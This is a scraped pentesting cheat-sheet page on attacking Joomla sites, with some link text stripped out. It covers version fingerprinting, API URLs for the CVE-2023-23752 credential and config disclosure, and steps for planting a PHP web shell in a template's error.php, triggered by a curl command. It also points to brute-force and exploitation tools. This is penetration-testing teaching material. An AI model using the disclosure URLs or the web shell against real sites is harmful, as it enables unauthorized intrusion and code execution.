Joomla
Last updated
Last updated
Learn & practice AWS Hacking: Learn & practice GCP Hacking:
Joomla collects some anonymous such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public .
Check the meta
robots.txt
README.txt
In /administrator/manifests/files/joomla.xml you can see the version.
In /language/en-GB/en-GB.xml you can get the version of Joomla.
In plugins/system/cache/cache.xml you can see an approximate version.
Versions From 4.0.0 to 4.2.7 are vulnerable to Unauthenticated information disclosure (CVE-2023-23752) that will dump creds and other information.
Users: http://<host>/api/v1/users?public=true
Config File: http://<host>/api/index.php/v1/config/application?public=true
If you managed to get admin credentials you can RCE inside of it by adding a snippet of PHP code to gain RCE. We can do this by customizing a template.
Click on Templates
on the bottom left under Configuration
to pull up the templates menu.
Click on a template name. Let's choose protostar
under the Template
column header. This will bring us to the Templates: Customise
page.
Finally, you can click on a page to pull up the page source. Let's choose the error.php
page. We'll add a PHP one-liner to gain code execution as follows:
system($_GET['cmd']);
Save & Close
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Privilege Escalation: Creates an user in Joomla.
(RCE) Built-In Templates Edit: Edit a Built-In Templates in Joomla.
(Custom) Custom Exploits: Custom Exploits for Third-Party Joomla Plugins.
In that can scan Joomla.
MSF Module: scanner/http/joomla_api_improper_access_checks
or ruby script:
You can use this to attempt to brute force the login.
: Joomla Exploitation Script that elevate XSS to RCE or Others Critical Vulnerabilities. For more info check . It provides support for Joomla Versions 5.X.X, 4.X.X, and 3.X.X, and allows to:
Learn & practice AWS Hacking: Learn & practice GCP Hacking:
Check the !
Join the 💬 or the or follow us on Twitter 🐦 .
Share hacking tricks by submitting PRs to the and github repos.